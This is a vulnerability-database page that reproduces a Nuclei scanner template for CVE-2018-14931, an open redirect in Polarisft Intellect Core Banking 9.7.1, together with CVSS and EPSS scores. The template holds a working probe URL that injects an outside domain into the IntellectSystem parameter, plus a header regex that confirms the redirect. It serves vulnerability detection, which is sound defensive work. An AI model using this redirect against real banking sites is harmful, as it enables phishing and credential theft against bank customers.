Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2018-14931
HistoryApr 18, 2022 - 8:33 a.m.

Polarisft Intellect Core Banking Software Version 9.7.1 - Open Redirect

2022-04-1808:33:41
ProjectDiscovery
github.com
3

5.8 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:P/I:P/A:N

6.1 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

0.001 Low

EPSS

Percentile

46.3%

Polarisft Intellect Core Banking Software Version 9.7.1 is susceptible to an open redirect issue in the Core and Portal modules via the /IntellectMain.jsp?IntellectSystem= URI.

id: CVE-2018-14931

info:
  name: Polarisft Intellect Core Banking Software Version 9.7.1 - Open Redirect
  author: 0x_Akoko
  severity: medium
  description: Polarisft Intellect Core Banking Software Version 9.7.1 is susceptible to an open redirect issue in the Core and Portal modules via the /IntellectMain.jsp?IntellectSystem= URI.
  impact: |
    An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the theft of sensitive information.
  remediation: |
    Apply the latest security patches or updates provided by Polarisft to fix the open redirect vulnerability.
  reference:
    - https://neetech18.blogspot.com/2019/03/polaris-intellect-core-banking-software_31.html
    - https://nvd.nist.gov/vuln/detail/CVE-2018-14931
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2018-14931
    cwe-id: CWE-601
    epss-score: 0.00118
    epss-percentile: 0.45948
    cpe: cpe:2.3:a:polarisft:intellect_core_banking:9.7.1:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: polarisft
    product: intellect_core_banking
  tags: cve,cve2018,redirect,polarisft,intellect

http:
  - method: GET
    path:
      - '{{BaseURL}}/IntellectMain.jsp?IntellectSystem=https://www.interact.sh'

    matchers:
      - type: regex
        part: header
        regex:
          - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1
# digest: 4b0a004830460221008f0f25f2551f0a387e62f98821d148b071d8feeb62c016ee0a73491fbef4b47c02210083dd29779ff7f5309807d128bb88de8a1a1aa9ca767c5b36f90a3313fc9bb651:922c64590222798bb761d5b6d8e72950

5.8 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:P/I:P/A:N

6.1 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

0.001 Low

EPSS

Percentile

46.3%

Related for NUCLEI:CVE-2018-14931